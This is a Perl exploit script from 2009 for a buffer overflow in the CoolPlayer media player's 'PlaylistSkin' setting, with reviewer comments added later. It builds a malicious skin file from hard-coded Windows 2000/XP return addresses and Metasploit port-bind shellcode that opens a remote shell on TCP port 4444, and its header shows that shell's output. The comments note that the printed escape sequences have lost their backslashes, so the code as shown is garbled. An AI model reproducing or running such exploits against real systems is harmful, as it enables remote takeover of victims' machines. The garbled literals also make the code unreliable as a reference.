# Title : CoolPlayer BUILD 219 (PlaylistSkin) Buffer Overflow Exploit
# Published : 2009-01-07
# Author : Jeremy Brown
#!/usr/bin/perl
# coolplayer_bof.pl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit
# http://coolplayer.sourceforge.net
#
# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING
#
# C:\Documents and Settings\Administrator> telnet localhost 4444
# .....
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# Some fun, good 'ole win32 smashing.. bada-bing bada-boom!
# Overview: this flat script writes a single .ini-style file whose
# "PlaylistSkin=" value is an oversized string (return-address padding
# followed by a payload).  Per the header comments, opening that file in
# CoolPlayer BUILD 219 overflows a fixed-size buffer.  From a defensive
# standpoint the relevant facts are: the output is fully deterministic,
# the crash trigger is a "[CoolPlayer Skin]" section with an abnormally
# long "PlaylistSkin" value, and the overwrite uses OS-specific hard-coded
# addresses (see below), so it is not a universal exploit.
#
# NOTE(review): the script has no `use strict;` / `use warnings;`, and
# every string literal on this page appears to have lost its backslashes
# during extraction (the `\n` and `\x..` escapes print as bare `n` / `x..`).
# Nothing below is altered; the comments only describe what is visible.

# Section header plus key.  The `n` after `]` is presumably a `\n` escape
# whose backslash was stripped; as printed it is a literal letter "n".
$header = "[CoolPlayer Skin]nPlaylistSkin=";
# Per-OS return addresses the author labels as JMP ESP in user32.dll.
# They are specific to Windows 2000 SP4 and XP SP3 builds (the two targets
# selectable via $ARGV[1] below); on other builds the overwrite simply crashes.
$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP
$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP
# Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444)
# NOTE(review): as printed, the `\` of each `\x..` escape is missing, so this
# Perl literal is a plain alphanumeric string rather than the byte sequence the
# comment above describes.  The author states it is an alphanumeric-encoded
# bind shell on TCP 4444 (matching the "LISTENING" line in the header); a
# listener on that port after a media player opens a playlist file is the
# observable that a detection rule would key on.
$shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" .
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" .
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" .
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" .
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e" .
"x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48" .
"x4ex46x46x32x46x42x4bx48x45x54x4ex33x4bx38x4ex37" .
"x45x30x4ax37x41x30x4fx4ex4bx38x4fx54x4ax41x4bx48" .
"x4fx35x42x32x41x50x4bx4ex49x34x4bx58x46x43x4bx58" .
"x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x48x42x4c" .
"x46x47x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" .
"x46x4fx4bx53x46x55x46x32x4ax32x45x37x45x4ex4bx48" .
"x4fx35x46x52x41x30x4bx4ex48x46x4bx58x4ex30x4bx54" .
"x4bx58x4fx35x4ex51x41x50x4bx4ex43x50x4ex32x4bx38" .
"x49x58x4ex46x46x52x4ex31x41x56x43x4cx41x53x4bx4d" .
"x46x46x4bx58x43x44x42x33x4bx38x42x54x4ex30x4bx48" .
"x42x47x4ex51x4dx4ax4bx48x42x34x4ax50x50x35x4ax36" .
"x50x38x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x56" .
"x43x55x48x56x4ax46x43x53x44x43x4ax36x47x57x43x57" .
"x44x33x4fx35x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e" .
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx45x49x38x45x4e" .
"x48x56x41x38x4dx4ex4ax50x44x30x45x45x4cx46x44x30" .
"x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x55" .
"x4fx4fx48x4dx43x55x43x55x43x55x43x55x43x45x43x44" .
"x43x35x43x54x43x55x4fx4fx42x4dx48x36x4ax46x41x31" .
"x4ex55x48x46x43x55x49x58x41x4ex45x59x4ax56x46x4a" .
"x4cx51x42x37x47x4cx47x35x4fx4fx48x4dx4cx56x42x51" .
"x41x35x45x45x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x32" .
"x49x4ex47x35x4fx4fx48x4dx43x35x45x35x4fx4fx42x4d" .
"x4ax56x45x4ex49x34x48x48x49x44x47x45x4fx4fx48x4d" .
"x42x55x46x55x46x35x45x45x4fx4fx42x4dx43x59x4ax46" .
"x47x4ex49x57x48x4cx49x37x47x55x4fx4fx48x4dx45x45" .
"x4fx4fx42x4dx48x56x4cx56x46x56x48x46x4ax46x43x56" .
"x4dx36x49x58x45x4ex4cx56x42x45x49x45x49x42x4ex4c" .
"x49x38x47x4ex4cx36x46x44x49x38x44x4ex41x33x42x4c" .
"x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x44x4ex32" .
"x43x39x4dx38x4cx37x4ax43x4bx4ax4bx4ax4bx4ax4ax46" .
"x44x57x50x4fx43x4bx48x41x4fx4fx45x57x46x44x4fx4f" .
"x48x4dx4bx35x47x45x44x55x41x55x41x55x41x35x4cx56" .
"x41x50x41x55x41x45x45x35x41x45x4fx4fx42x4dx4ax56" .
"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx36" .
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x55x4ex4f" .
"x43x48x46x4cx46x56x4fx4fx48x4dx44x55x4fx4fx42x4d" .
"x4ax56x4fx4ex50x4cx42x4ex42x56x43x35x4fx4fx48x4d" .
"x4fx4fx42x4dx5a";
# Command-line arguments: output path and target selector (1 or 2).
$filename = $ARGV[0];
$target = $ARGV[1];
# Usage check.  NOTE(review): it prints the usage text but does not `exit`,
# so with missing arguments execution falls through to the open() below with
# an undefined $filename.  The trailing `n` is another stripped `\n`.
if(!defined($filename) || !defined($target))
{
print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]n";
}
# Numeric compare against a string literal ("1" numifies to 1, so it works).
# pack('l') emits the address as a 4-byte little-endian integer.  If $target
# is neither 1 nor 2, $retaddr stays undef and the repetition below yields an
# empty string (with an "uninitialized value" warning under `use warnings`).
if($target == "1") { $retaddr = pack('l', $win2ksp4); }
if($target == "2") { $retaddr = pack('l', $winxpsp3); }
# `x` binds tighter than `.`, so the address is repeated 377 times (1508 bytes
# of padding, as the author's arithmetic notes) and then the payload appended.
$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508
# NOTE(review): 2-arg open with the mode concatenated into the string, a
# bareword filehandle, and no `or die` — a failed open is silently ignored and
# the print/close below proceed against a handle that was never opened.
open(FILE, '>' . $filename);
print FILE $payload;
close(FILE);
exit;